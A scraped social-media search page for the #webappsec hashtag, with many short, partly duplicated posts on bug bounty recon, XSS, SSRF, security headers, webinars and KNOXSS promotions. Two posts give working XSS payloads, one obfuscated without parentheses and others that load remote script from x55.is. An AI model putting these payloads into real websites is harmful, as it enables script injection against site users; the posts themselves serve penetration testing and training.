#webappsec ผลการค้นหา
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
What would you like to see about #XSS here? 🤔 Let us know in the comments! #WebAppSec #BugBounty #PenTesting
Mind the Headers: HTTP Security Headers (X-Frame-Options, X-Content-Type-Options, etc.) are crucial for defending against various attacks. Ensure your web app is fortified! #WebAppSec
Don't Underestimate HTTP Desync Attacks! HTTP Request Smuggling can lead to cache poisoning, XSS, and more. Make sure you know how to handle such vulnerabilities to keep your applications safe! #CyberSecurity #WebAppSec
Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec
Here's my research about Python dirty Arbitrary File Write to RCE via overwriting shared object files or overwriting bytecode files. Enjoy! siunam321.github.io/research/pytho… #Research #WebAppSec
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam
Here's my attempted research in PHP class pollution! Although I couldn't escape the object context and pollute other classes, it's still interesting that we can pollute the object's attributes and associative array's keys. siunam321.github.io/research/attem… #Research #WebAppSec
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
Stay one step ahead of attackers by discovering essential best practices to secure your web applications and protect sensitive data. #CyberSecurity #WebAppSec #OWASP #cybersecurityawareness
Talking about #SSRF, I just got an idea to add SSRF-based #XSS to @KN0X55 ! It's coming in the update next week most probably. #WebAppSec #BugBounty #PenTesting
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
🔟 Server-Side Request Forgery (SSRF) ➡️ Attackers trick servers into making malicious requests. 🔑 Validate URLs, restrict network access, use allowlists. #SSRF #WebAppSec
Upload forms seem basic but are potential goldmines for attackers. The Upload Vulnerabilities room on @RealTryHackMe showed how easily malicious files bypass basic filters. A simple profile picture turning into remote code execution was mind-blowing. #UploadVulns #WebAppSec #RCE
🏆 KNOXSS September 2025 Giveaway 🏆 ➡️ Follow, like and share! 😍 ➡️ 1 Month Pro access for 3 winners on Friday 5th Good luck! 🤞 Check what only KNOXSS can find for you: knoxss.pro/?page_id=766 knoxss.pro - try it now! #WebAppSec #BugBounty #PenTesting
Improve your #XSS PoCs w/ a remote call to our X55.is domain! ➡️ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…
x55.is
XSS Gym - Train your XSS Muscles
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
🛠️ Webinar — Writing Your First Burp Extension 📅 28 Aug 2025 | 🕘 9–10 PM 🎤 Speaker: Marcus (a.k.a benkyou) 🔗 Join: linkedin.com/feed/update/ur… #CyberSecurity #BurpSuite #WebAppSec #CTF #Webinar
7/7 Security is about layers, not just a single pattern-matching rule. What are your go-to methods for bypassing filtered SSTI? #SSTI #BugBountyTips #WebAppSec #CyberSecurity #RedTeam
⚠️ Stop Web Cache Deception in React.js: attackers exploit fake .css/.js paths. Learn Cache-Control, Vary, Next.js middleware, service workers, tests—with code. #ReactJS #CyberSecurity #WebAppSec #Nextjs #InfoSec cybersrely.com/web-cache-dece…
The 1-month plan is back! 😎 Billed just once, no recurring charges. It's perfect for you that want to try KNOXSS for the 1st time. Sign up and/or upgrade your existing account. knoxss.pro - #XSS made easy. #WebAppSec #BugBounty #PenTesting
The 1-month plan is back! 😎 Billed just once, no recurring charges. It's perfect for you that want to try KNOXSS for the 1st time. Sign up and/or upgrade your existing account. knoxss.pro #WebAppSec #BugBounty #PenTesting
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…
Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam
Courtesy of @psiinon a performance fix for @zaproxy Auth Helper was released earlier today. #AppSec #WebAppSec #DevSecOps #DAST
Mind the Headers: HTTP Security Headers (X-Frame-Options, X-Content-Type-Options, etc.) are crucial for defending against various attacks. Ensure your web app is fortified! #WebAppSec
Don't Underestimate HTTP Desync Attacks! HTTP Request Smuggling can lead to cache poisoning, XSS, and more. Make sure you know how to handle such vulnerabilities to keep your applications safe! #CyberSecurity #WebAppSec
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
There are several ways to test for #XSS that can be done manually but it is time expensive and very prone to be forgotten in a proper security assessment. Try knoxss.me #WebAppSec #PenTesting #BugBounty
🔍 How to crush it in bug hunting and web application pentesting effectively! Uncover vulnerabilities, master recon techniques, and level up your security skills. 🚀 🔗vivekpentest.com/2024/06/Bug%20… #BugBounty #WebAppSec #Pentesting #CyberSecurity #EthicalHacking #InfoSec #bugbounty
Get serious about #XSS! Sign up or upgrade. knoxss.pro - built for pros. #WebAppSec #BugBounty #Pentesting
Something went wrong.
Something went wrong.
United States Trends
- 1. Columbus 71.5K posts
- 2. #SwiftDay 8,571 posts
- 3. #WWERaw 24.6K posts
- 4. #IDontWantToOverreactBUT N/A
- 5. #IndigenousPeoplesDay 3,043 posts
- 6. #TSTheErasTour 2,214 posts
- 7. Marc 36.2K posts
- 8. Knesset 123K posts
- 9. Good Monday 40.6K posts
- 10. Victory Monday 1,702 posts
- 11. Thanksgiving 43.6K posts
- 12. Flip 48.8K posts
- 13. Branch 48.5K posts
- 14. Kairi 10.2K posts
- 15. Broadcom 1,964 posts
- 16. Happy 250th 2,177 posts
- 17. Rod Wave 3,194 posts
- 18. Penta 4,766 posts
- 19. GOD BLESS THE PEACEMAKER 4,501 posts
- 20. The Final Show 28.2K posts